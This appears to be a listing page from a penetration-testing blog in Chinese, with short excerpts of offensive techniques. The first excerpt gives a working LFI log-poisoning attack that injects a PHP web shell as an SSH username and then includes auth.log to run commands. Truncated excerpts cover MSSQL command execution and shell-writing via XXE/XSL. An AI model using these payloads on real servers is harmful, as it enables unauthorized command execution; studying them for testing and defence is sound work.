LFI SSH日志

in 奇技淫巧 read (687)

登陆SSH: ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105 包含文件: http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls

Continue reading

0x00 简介 渗透测试过程中,大家经常会碰到通过MSSQL来进行提权或执行系统命令之类的操作,通常我们经常会使用xp_cmdshell来进行执行系统命令,但是当xp_cmdshell不能使用的时候,我们还有什么别的方式么?本文将介绍与分享一下我自己学到的一些姿势。 0x...

Continue reading

XXE with XSL

in 奇技淫巧 read (616)

当XXE支持XSL时,可以直接执行命令: 写shell <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999...

Continue reading

Hack With XSLT

in 技术分享,渗透案例 read (1697)

0x00 简介 XSLT全称为拓展样式表转换语言,是一种用于将 XML 文档转换为 XHTML 文档或其他 XML 文档的语言。更多关于XSLT的教程可以参考W3school。关于XSLT的hack技巧之前已经有老师总结了WebShell系列(一)---XML,里面详细介...

Continue reading

Evi1cg

The way to be safe is never to be secure !